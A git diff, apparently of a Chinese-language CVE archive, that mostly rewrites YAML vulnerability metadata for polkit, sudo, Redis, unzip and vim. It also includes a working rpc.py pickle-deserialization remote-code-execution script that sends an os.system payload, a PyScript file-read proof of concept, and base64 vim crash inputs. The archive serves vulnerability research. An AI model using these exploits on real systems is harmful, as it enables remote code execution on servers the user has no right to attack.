@@ -1,23 +1,23 @@
-id: CVE-2021-4115
-source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115
-info:
- name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。
- severity: Medium
- description: |
- Polkit 存在资源管理错误漏洞,该漏洞源于进程文件描述符耗尽,攻击者利用该漏洞允许非特权用户导致polkit崩溃。
- scope-of-influence:
- polkit = 0.117
- reference:
- - https://access.redhat.com/security/cve/cve-2021-4115
- - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e
- - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141
- - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/
- - https://www.oracle.com/security-alerts/cpujul2022.html
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
- cvss-score: 5.5
- cve-id: CVE-2021-4115
- cwe-id: CWE-400
- cnvd-id: None
- kve-id: None
+id: CVE-2021-4115
+source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115
+info:
+ name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。
+ severity: Medium
+ description: |
+ Polkit 存在资源管理错误漏洞,该漏洞源于进程文件描述符耗尽,攻击者利用该漏洞允许非特权用户导致polkit崩溃。
+ scope-of-influence:
+ polkit = 0.117
+ reference:
+ - https://access.redhat.com/security/cve/cve-2021-4115
+ - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e
+ - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141
+ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/
+ - https://www.oracle.com/security-alerts/cpujul2022.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 5.5
+ cve-id: CVE-2021-4115
+ cwe-id: CWE-400
+ cnvd-id: None
+ kve-id: None
 tags: cve2021, 未加控制的资源消耗(资源穷尽)
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt
index c9a9c288..5df5b8b9 100644
--- a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt
+++ b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt
@@ -1,18 +1,18 @@
-# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
-Source Codes Read
-# Date: 5-9-2022
-# Exploit Author: Momen Eldawakhly (Cyber Guy)
-# Vendor Homepage: https://pyscript.net/
-# Software Link: https://github.com/pyscript/pyscript
-# Version: 2022-05-04-Alpha
-# Tested on: Ubuntu Apache Server
-# CVE : CVE-2022-30286
-
-
-x = "CyberGuy"
-if x == "CyberGuy":
- with open('/lib/python3.10/asyncio/tasks.py') as output:
- contents = output.read()
- print(contents)
-print('')
+# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
+Source Codes Read
+# Date: 5-9-2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://pyscript.net/
+# Software Link: https://github.com/pyscript/pyscript
+# Version: 2022-05-04-Alpha
+# Tested on: Ubuntu Apache Server
+# CVE : CVE-2022-30286
+
+
+x = "CyberGuy"
+if x == "CyberGuy":
+ with open('/lib/python3.10/asyncio/tasks.py') as output:
+ contents = output.read()
+ print(contents)
+print('')
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-30286/README.md b/cve/python/2022/CVE-2022-30286/README.md
index 68e763a9..bae1fb18 100644
--- a/cve/python/2022/CVE-2022-30286/README.md
+++ b/cve/python/2022/CVE-2022-30286/README.md
@@ -1,25 +1,25 @@
-# PyScript Remote Emscripten VMemory Python libraries
-Date: 5-9-2022
-Exploit Author: Momen Eldawakhly (Cyber Guy)
-Vendor Homepage: https://pyscript.net/
-Software Link: https://github.com/pyscript/pyscript
-Version: 2022-05-04-Alpha
-Tested on: Ubuntu Apache Server
-CVE : CVE-2022-30286
-# Poc
-```
-
-x = "CyberGuy"
-if x == "CyberGuy":
- with open('/lib/python3.10/asyncio/tasks.py') as output:
- contents = output.read()
- print(contents)
-print('')
-
-```
-# reference
-http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html
-https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript
-https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read
-https://github.com/pyscript/pyscript/commits/main
+# PyScript Remote Emscripten VMemory Python libraries
+Date: 5-9-2022
+Exploit Author: Momen Eldawakhly (Cyber Guy)
+Vendor Homepage: https://pyscript.net/
+Software Link: https://github.com/pyscript/pyscript
+Version: 2022-05-04-Alpha
+Tested on: Ubuntu Apache Server
+CVE : CVE-2022-30286
+# Poc
+```
+
+x = "CyberGuy"
+if x == "CyberGuy":
+ with open('/lib/python3.10/asyncio/tasks.py') as output:
+ contents = output.read()
+ print(contents)
+print('')
+
+```
+# reference
+http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html
+https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript
+https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read
+https://github.com/pyscript/pyscript/commits/main
 https://www.exploit-db.com/exploits/50918
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py
index 467cc175..1ea07853 100644
--- a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py
+++ b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py
@@ -1,52 +1,52 @@
-# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
-# Google Dork: N/A
-# Date: 2022-07-12
-# Exploit Author: Elias Hohl
-# Vendor Homepage: https://github.com/abersheeran
-# Software Link: https://github.com/abersheeran/rpc.py
-# Version: v0.4.2 - v0.6.0
-# Tested on: Debian 11, Ubuntu 20.04
-# CVE : CVE-2022-35411
-
-import requests
-import pickle
-
-# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
-
-HOST =3D "127.0.0.1:65432"
-
-URL =3D f"http://{HOST}/sayhi"
-
-HEADERS =3D {
- "serializer": "pickle"
-}
-
-
-def generate_payload(cmd):
-
- class PickleRce(object):
- def __reduce__(self):
- import os
- return os.system, (cmd,)
-
- payload =3D pickle.dumps(PickleRce())
-
- print(payload)
-
- return payload
-
-
-def exec_command(cmd):
-
- payload =3D generate_payload(cmd)
-
- requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
-
-
-def main():
- exec_command('curl http://127.0.0.1:4321')
- # exec_command('uname -a')
-
-
-if __name__ =3D=3D "__main__":
+# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 2022-07-12
+# Exploit Author: Elias Hohl
+# Vendor Homepage: https://github.com/abersheeran
+# Software Link: https://github.com/abersheeran/rpc.py
+# Version: v0.4.2 - v0.6.0
+# Tested on: Debian 11, Ubuntu 20.04
+# CVE : CVE-2022-35411
+
+import requests
+import pickle
+
+# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
+
+HOST =3D "127.0.0.1:65432"
+
+URL =3D f"http://{HOST}/sayhi"
+
+HEADERS =3D {
+ "serializer": "pickle"
+}
+
+
+def generate_payload(cmd):
+
+ class PickleRce(object):
+ def __reduce__(self):
+ import os
+ return os.system, (cmd,)
+
+ payload =3D pickle.dumps(PickleRce())
+
+ print(payload)
+
+ return payload
+
+
+def exec_command(cmd):
+
+ payload =3D generate_payload(cmd)
+
+ requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
+
+
+def main():
+ exec_command('curl http://127.0.0.1:4321')
+ # exec_command('uname -a')
+
+
+if __name__ =3D=3D "__main__":
 main()
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md
index fbc23347..25db92b4 100644
--- a/cve/python/2022/CVE-2022-35411/README.md
+++ b/cve/python/2022/CVE-2022-35411/README.md
@@ -1,18 +1,18 @@
-# rpc.py 0.6.0 - Remote Code Execution (RCE)
-Google Dork: N/A
-Date: 2022-07-12
-Exploit Author: Elias Hohl
-Vendor Homepage: https://github.com/abersheeran
-Software Link: https://github.com/abersheeran/rpc.py
-Version: v0.4.2 - v0.6.0
-Tested on: Debian 11, Ubuntu 20.04
-CVE : CVE-2022-35411
-# Usage
-```
-python CVE-2022-35411.py
-```
-# reference
-http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html
-https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory
-https://github.com/ehtec/rpcpy-exploit Third Party Advisory
+# rpc.py 0.6.0 - Remote Code Execution (RCE)
+Google Dork: N/A
+Date: 2022-07-12
+Exploit Author: Elias Hohl
+Vendor Homepage: https://github.com/abersheeran
+Software Link: https://github.com/abersheeran/rpc.py
+Version: v0.4.2 - v0.6.0
+Tested on: Debian 11, Ubuntu 20.04
+CVE : CVE-2022-35411
+# Usage
+```
+python CVE-2022-35411.py
+```
+# reference
+http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html
+https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory
+https://github.com/ehtec/rpcpy-exploit Third Party Advisory
 https://medium.com/@elias.hohl/remote-code-execution-0-day-in-rpc-py-709c76690c30
\ No newline at end of file
diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml
index 613b5007..3d2d3f07 100644
--- a/cve/python/2022/yaml/CVE-2022-30286.yaml
+++ b/cve/python/2022/yaml/CVE-2022-30286.yaml
@@ -1,24 +1,24 @@
-id: CVE-2022-30286
-source: https://www.exploit-db.com/exploits/50918
-info:
- name: PyScript Remote Emscripten VMemory Python libraries
- severity: critical
- description:
- pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code.
- scope-of-influence:
- PyScript < v2.3
- reference:
- - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html
- - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript
- - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read
- - https://github.com/pyscript/pyscript/commits/main
- - https://www.exploit-db.com/exploits/50918
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2022-30286
- cwe-id: None
- cnvd-id: None
- kve-id: None
- tags:
+id: CVE-2022-30286
+source: https://www.exploit-db.com/exploits/50918
+info:
+ name: PyScript Remote Emscripten VMemory Python libraries
+ severity: critical
+ description:
+ pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code.
+ scope-of-influence:
+ PyScript < v2.3
+ reference:
+ - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html
+ - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript
+ - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read
+ - https://github.com/pyscript/pyscript/commits/main
+ - https://www.exploit-db.com/exploits/50918
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-30286
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags:
 - Source Codes Read
\ No newline at end of file
diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml
index 3e14c184..c8e145a5 100644
--- a/cve/python/2022/yaml/CVE-2022-35411.yaml
+++ b/cve/python/2022/yaml/CVE-2022-35411.yaml
@@ -1,22 +1,22 @@
-id: CVE-2022-35411
-source: https://www.exploit-db.com/exploits/50983
-info:
- name: python中的rpc库,rpc是远程过程调用(Remote Procedure Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。
- severity: critical
- description:
- rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.
- scope-of-influence:
- rpc.py v0.4.2 - v0.6.0
- reference:
- - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html
- - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd
- - https://github.com/ehtec/rpcpy-exploit
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-35411
- cwe-id: None
- cnvd-id: None
- kve-id: None
- tags:
- - 远程代码执行
+id: CVE-2022-35411
+source: https://www.exploit-db.com/exploits/50983
+info:
+ name: python中的rpc库,rpc是远程过程调用(Remote Procedure Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。
+ severity: critical
+ description:
+ rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.
+ scope-of-influence:
+ rpc.py v0.4.2 - v0.6.0
+ reference:
+ - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html
+ - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd
+ - https://github.com/ehtec/rpcpy-exploit
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-35411
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 远程代码执行
diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml
index 7b5dcafb..7b0a82da 100644
--- a/cve/redis/2022/yaml/CVE-2022-31144.yaml
+++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml
@@ -1,24 +1,24 @@
-id: CVE-2022-31144
-source:
- https://github.com/SpiralBL0CK/CVE-2022-31144
-info:
- name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力.
- severity: High
- description: |
- Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布.
- scope-of-influence:
- 7.0 <= redis < 7.0.4
- reference:
- - https://github.com/redis/redis/releases/tag/7.0.4
- - https://nvd.nist.gov/vuln/detail/CVE-2022-31144
- - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh
- - https://security.gentoo.org/glsa/202209-17
- - https://security.netapp.com/advisory/ntap-20220909-0002/
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2022-31144
- cwe-id: CWE-787, CWE-122
- cnvd-id: None
- kve-id: None
+id: CVE-2022-31144
+source:
+ https://github.com/SpiralBL0CK/CVE-2022-31144
+info:
+ name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力.
+ severity: High
+ description: |
+ Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布.
+ scope-of-influence:
+ 7.0 <= redis < 7.0.4
+ reference:
+ - https://github.com/redis/redis/releases/tag/7.0.4
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-31144
+ - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh
+ - https://security.gentoo.org/glsa/202209-17
+ - https://security.netapp.com/advisory/ntap-20220909-0002/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-31144
+ cwe-id: CWE-787, CWE-122
+ cnvd-id: None
+ kve-id: None
 tags: 堆溢出, 远程代码执行
\ No newline at end of file
diff --git a/cve/sudo/2019/CVE-2019-18634/.gitignore b/cve/sudo/2019/CVE-2019-18634/.gitignore
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/LICENSE b/cve/sudo/2019/CVE-2019-18634/LICENSE
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/Makefile b/cve/sudo/2019/CVE-2019-18634/Makefile
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/README.md b/cve/sudo/2019/CVE-2019-18634/README.md
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/exploit.c b/cve/sudo/2019/CVE-2019-18634/exploit.c
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/yaml/CVE-2019-14287.yaml b/cve/sudo/2019/yaml/CVE-2019-14287.yaml
index 3abae8b7..9eee215b 100644
--- a/cve/sudo/2019/yaml/CVE-2019-14287.yaml
+++ b/cve/sudo/2019/yaml/CVE-2019-14287.yaml
@@ -1,20 +1,20 @@
-id: CVE-2019-14287
-source: https://github.com/n0w4n/CVE-2019-14287
-info:
- name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。
- severity: high
- description: |
- 在1.8.28之前的Sudo中,访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块,并使用精心设计的用户ID调用Sudo,从而导致错误的日志记录。例如,对于"sudo -u \#$((0xffffffff))"命令,这允许绕过!root和USER=logging。
- scope-of-influence:
- sudo < 1.8.28
- reference:
- - https://access.redhat.com/security/cve/cve-2019-14287
- - https://nvd.nist.gov/vuln/detail/CVE-2019-14287
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2019-14287
- cwe-id: CWE-755
- cnvd-id: None
- kve-id: None
- tags: CVE-2019-14287, sudo
+id: CVE-2019-14287
+source: https://github.com/n0w4n/CVE-2019-14287
+info:
+ name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。
+ severity: high
+ description: |
+ 在1.8.28之前的Sudo中,访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块,并使用精心设计的用户ID调用Sudo,从而导致错误的日志记录。例如,对于"sudo -u \#$((0xffffffff))"命令,这允许绕过!root和USER=logging。
+ scope-of-influence:
+ sudo < 1.8.28
+ reference:
+ - https://access.redhat.com/security/cve/cve-2019-14287
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-14287
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-14287
+ cwe-id: CWE-755
+ cnvd-id: None
+ kve-id: None
+ tags: CVE-2019-14287, sudo
diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml
index 8fad7320..044f24e4 100644
--- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml
+++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml
@@ -1,20 +1,20 @@
-id: CVE-2023-22809
-source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
-info:
- name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
- severity: high
- description:
- Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
- scope-of-influence:
- sudo@[1.8.0, 1.9.12p2)
- references:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-22809
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-22809
- cwe-id: CWE-269
- cnvd-id: None
- kve-id: None
- tags:
+id: CVE-2023-22809
+source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
+info:
+ name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
+ severity: high
+ description:
+ Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
+ scope-of-influence:
+ sudo@[1.8.0, 1.9.12p2)
+ references:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-22809
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-22809
+ cwe-id: CWE-269
+ cnvd-id: None
+ kve-id: None
+ tags:
 - 特权管理不当
\ No newline at end of file
diff --git a/cve/unzip/2022/yaml/CVE-2022-0529.yaml b/cve/unzip/2022/yaml/CVE-2022-0529.yaml
index 7838180f..c24d3bac 100644
--- a/cve/unzip/2022/yaml/CVE-2022-0529.yaml
+++ b/cve/unzip/2022/yaml/CVE-2022-0529.yaml
@@ -1,19 +1,19 @@
-id: CVE-2022-0529
-source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529
-info:
- name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。
- severity: MEDIUM
- description:
- A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.
- scope-of-influence:
- unzip Up to (excluding) 6.0-r11
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-0529
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
- cvss-score: 5.5
- cve-id: CVE-2022-0529
- cwe-id: CWE-787
- cnvd-id: None
- kve-id: None
+id: CVE-2022-0529
+source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529
+info:
+ name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。
+ severity: MEDIUM
+ description:
+ A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.
+ scope-of-influence:
+ unzip Up to (excluding) 6.0-r11
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0529
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
+ cvss-score: 5.5
+ cve-id: CVE-2022-0529
+ cwe-id: CWE-787
+ cnvd-id: None
+ kve-id: None
 tags: CVE-2022, unzip
\ No newline at end of file
diff --git a/cve/vim/2021/CVE-2021-3778/other_poc.txt b/cve/vim/2021/CVE-2021-3778/other_poc.txt
index a0d7e453..c86353be 100644
--- a/cve/vim/2021/CVE-2021-3778/other_poc.txt
+++ b/cve/vim/2021/CVE-2021-3778/other_poc.txt
@@ -1,6 +1,6 @@
-1.
-echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt
-vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa!
-2.
-echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt
+1.
+echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt
+vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa!
+2.
+echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt
 vim -u NONE -X -Z -e -s -S fuzz000.txt -c :qa!
\ No newline at end of file
diff --git a/cve/vim/2021/CVE-2021-3778/readme.md b/cve/vim/2021/CVE-2021-3778/readme.md
index fa732e1b..3f0cee11 100644
--- a/cve/vim/2021/CVE-2021-3778/readme.md
+++ b/cve/vim/2021/CVE-2021-3778/readme.md
@@ -1,11 +1,11 @@
-Exact steps we followed to find this bug:
-
-1 -- git clone https://github.com/vim/vim
-
-2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
-
-3 -- make
-
-4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt
-
+Exact steps we followed to find this bug:
+
+1 -- git clone https://github.com/vim/vim
+
+2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
+
+3 -- make
+
+4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt
+
 5 -- vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa!
\ No newline at end of file
diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml
index a009ea6b..d847d833 100644
--- a/cve/vim/2021/yaml/CVE-2021-3778.yaml
+++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-3778
-source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
-info:
- name: vim: Heap-based Buffer Overflow in ex_retab()
- severity:
- HIGH
- description: |
- vim容易受到基于堆的缓冲区溢出的攻击
- scope-of-influence:
- vim = 8.2
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-3778
- - https://www.openwall.com/lists/oss-security/2021/10/01/1
- - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2021-3778
- cwe-id: CWE-787, CWE-122
- cnvd-id: None
- kve-id: None
+id: CVE-2021-3778
+source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
+info:
+ name: vim: Heap-based Buffer Overflow in ex_retab()
+ severity:
+ HIGH
+ description: |
+ vim容易受到基于堆的缓冲区溢出的攻击
+ scope-of-influence:
+ vim = 8.2
+ reference:
